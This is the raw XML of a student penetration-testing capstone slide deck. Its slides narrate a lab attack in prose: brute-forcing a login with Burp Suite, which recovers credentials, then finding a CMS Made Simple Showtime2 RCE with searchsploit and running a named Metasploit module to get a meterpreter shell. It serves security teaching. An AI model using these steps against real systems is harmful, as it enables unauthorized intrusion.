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7" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="267" r:id="rId4"/>
    <p:sldId id="268" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="261" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="275" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="262" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="279" r:id="rId20"/>
    <p:sldId id="263" r:id="rId21"/>
    <p:sldId id="280" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="264" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="283" r:id="rId26"/>
    <p:sldId id="265" r:id="rId27"/>
    <p:sldId id="266" r:id="rId28"/>
  </p:sldIdLst>
  <p:sldSz cx="14630400" cy="8229600"/>
  <p:notesSz cx="8229600" cy="14630400"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Barlow Bold" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId31"/>
      <p:bold r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat Bold" panose="00000800000000000000" pitchFamily="2" charset="0"/>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0" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="80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61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6176" y="658297"/>
            <a:ext cx="7471648" cy="4338638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Penetration Testing: A Practical Capstone Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836176" y="5355312"/>
            <a:ext cx="7471648" cy="1529239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1850" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This presentation outlines a practical penetration testing project, demonstrating the steps involved in identifying vulnerabilities, exploiting them, and achieving a predetermined objective.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903962" y="7153275"/>
            <a:ext cx="6236494" cy="418028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>by Muhammad Yaseen </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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B22CFFD-A1C1-FB9B-67CF-85A640F342BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="694888"/>
            <a:ext cx="7415927" cy="2232898"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9951"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282C32"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="60960" dist="30480" dir="13500000" algn="bl" rotWithShape="0">
              <a:srgbClr val="FFFFFF">
                <a:alpha val="10000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A8ECA0-2C00-C8A6-9558-CA4B0D1D4F7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864036" y="941705"/>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EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Brute-Force Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF055498-4817-CA70-41A6-E6D879E280F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864036" y="1495822"/>
            <a:ext cx="6922294" cy="1185148"/>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Wget was employed to download "user.list" and "password.list" files from the target server, preparing for a brute-force attack using BURPSUIT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE79B43-7D25-7A60-45B2-27514961A1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8499" y="2927786"/>
            <a:ext cx="9743617" cy="4920735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3948914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1D9E2-AC99-898A-52EE-BE46EA711121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049416" y="3238756"/>
            <a:ext cx="11849093" cy="3967184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8843A903-7496-9073-42A1-FD402D7FD011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263610" y="1180227"/>
            <a:ext cx="761286" cy="30480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 642330"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="60646A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BBEB4B-9C6B-9132-CCF4-E31B3E55A24C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804743" y="950793"/>
            <a:ext cx="489347" cy="489347"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 40009"/>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6" name="Text 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A1184F-6767-4202-9116-E8D5A4932745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956667" y="1023660"/>
            <a:ext cx="185499" cy="343495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C52FB7-21B1-4EE3-5B32-CFE21A0E4B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2245757" y="923647"/>
            <a:ext cx="3368635" cy="357783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Successful Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE4B6381-777F-85C1-546D-B437F517EB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2245757" y="1411923"/>
            <a:ext cx="6098857" cy="696039"/>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brute force attack successfully obtained valid credentials: Username: "west" and Password: "madison."</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424235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46058" y="664726"/>
            <a:ext cx="6361509" cy="795099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="846058" y="1943219"/>
            <a:ext cx="4070985" cy="2516029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846058" y="4761309"/>
            <a:ext cx="3746897" cy="397669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Vulnerability Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846058" y="5303996"/>
            <a:ext cx="4070985" cy="1546860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Searchsploit was used to discover a Remote Code Execution (RCE) vulnerability in the CMS Showtime2 plugin.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279588" y="1943219"/>
            <a:ext cx="4071104" cy="2516029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279588" y="4761309"/>
            <a:ext cx="3180755" cy="397669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploit Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279588" y="5303996"/>
            <a:ext cx="4071104" cy="2320290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Metasploit was employed to execute the RCE exploit ("exploit/multi/http/cmsms_showtime2_rce"), resulting in a meterpreter shell on the target system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9713238" y="1943219"/>
            <a:ext cx="4071104" cy="2516029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9713238" y="4761309"/>
            <a:ext cx="3180755" cy="397669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Shell Upgrade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9713238" y="5303996"/>
            <a:ext cx="4071104" cy="1160145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The meterpreter shell was upgraded to a fully interactive one using a Python one-liner.</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E6E035ED-57C7-7B43-C464-6AD630A8FE2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792123" y="781010"/>
            <a:ext cx="3826907" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Vulnerability Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54306616-5236-A522-59D5-27B29EF4614B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792123" y="1433830"/>
            <a:ext cx="8262977" cy="1580198"/>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Searchsploit was used to discover a Remote Code Execution (RCE) vulnerability in the CMS Showtime2 plugin.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13BEE81C-E9FD-D1B8-F76F-BD3D52AD0AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3931147"/>
            <a:ext cx="14434932" cy="3087472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
